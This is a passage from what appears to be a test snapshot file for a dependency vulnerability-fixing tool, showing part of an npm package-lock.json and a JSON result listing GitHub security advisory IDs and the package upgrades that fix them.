"https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, "gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "requires": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" } }, "getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "requires": { "assert-plus": "^1.0.0" } }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" } }, "graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "requires": { "natives": "^1.1.3" } }, "har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" }, "har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "requires": { "ajv": "^6.12.3", "har-schema": "^2.0.0" } }, "has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "requires": { "function-bind": "^1.1.2" } }, "hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "requires": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" } }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "requires": { "once": "^1.3.0", "wrappy": "1" } }, "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "requires": { "hasown": "^2.0.0" } }, "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true }, "is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" } }, "mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, "mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { "mime-db": "1.52.0" } }, "minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "requires": { "brace-expansion": "^1.1.7" } }, "minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "requires": { "minimist": "^1.2.6" } }, "natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==" }, "normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "requires": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "requires": { "hosted-git-info": "^1.5.3", "semver": "4" }, "dependencies": { "hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" } } }, "npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "requires": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "npmlog": "", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" } }, "npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "requires": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" } }, "oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { "wrappy": "1" } }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" }, "path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==" }, "qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" }, "readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "requires": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" } }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } }, "retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==" }, "rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "requires": { "glob": "^7.1.3" } }, "safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==" }, "set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true }, "slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==" }, "spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "requires": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- [TestCommand/fix_non-interactive_json_in-place_package-lock.json - 1] { "path": "/package-lock.json", "ecosystem": "npm", "strategy": "in-place", "vulnerabilities": [ { "id": "GHSA-23c5-xmqv-rm74", "packages": [ { "name": "minimatch", "version": "3.1.2" } ] }, { "id": "GHSA-2g4f-4pwh-qvx6", "packages": [ { "name": "ajv", "version": "6.12.6" } ] }, { "id": "GHSA-43f8-2h32-f4cj", "packages": [ { "name": "hosted-git-info", "version": "2.1.4" } ] }, { "id": "GHSA-43f8-2h32-f4cj", "packages": [ { "name": "hosted-git-info", "version": "1.6.0" } ], "unactionable": true }, { "id": "GHSA-6rw7-vpxm-498p", "packages": [ { "name": "qs", "version": "6.5.3" } ], "unactionable": true }, { "id": "GHSA-72xf-g2v4-qvf3", "packages": [ { "name": "tough-cookie", "version": "2.5.0" } ], "unactionable": true }, { "id": "GHSA-c2qf-rxjj-qqgw", "packages": [ { "name": "semver", "version": "4.3.6" } ], "unactionable": true }, { "id": "GHSA-c6rq-rjc2-86v2", "packages": [ { "name": "chownr", "version": "0.0.2" } ], "unactionable": true }, { "id": "GHSA-fjxv-7rqg-78g4", "packages": [ { "name": "form-data", "version": "2.3.3" } ], "unactionable": true }, { "id": "GHSA-g74r-ffvr-5q9f", "packages": [ { "name": "concat-stream", "version": "1.5.0" } ] }, { "id": "GHSA-p8p7-x288-28g6", "packages": [ { "name": "request", "version": "2.88.2" } ], "unactionable": true }, { "id": "GHSA-v6h2-p8h4-qcjw", "packages": [ { "name": "brace-expansion", "version": "1.1.11" } ] } ], "patches": [ { "packageUpdates": [ { "name": "minimatch", "versionFrom": "3.1.2", "versionTo": "3.1.5", "transitive": true } ], "fixed": [ { "id": "GHSA-23c5-xmqv-rm74", "packages": [ { "name": "minimatch", "version": "3.1.2" } ] }, { "id": "GHSA-3ppc-4f35-3m26", "packages": [ { "name": "minimatch", "version": "3.1.2" } ] }, { "id": "GHSA-7r86-cg39-jmmj", "packages": [ { "name": "minimatch", "version": "3.1.2" } ] } ] }, { "packageUpdates": [ { "name": "ajv", "versionFrom": "6.12.6", "versionTo": "6.14.0", "transitive": true } ], "fixed": [ { "id": "GHSA-2g4f-4pwh-qvx6", "packages": [ { "name": "ajv", "version": "6.12.6" } ] } ] }, { "packageUpdates": [ { "name": "brace-expansion", "versionFrom": "1.1.11", "versionTo": "1.1.12", "transitive": true } ], "fixed": [ { 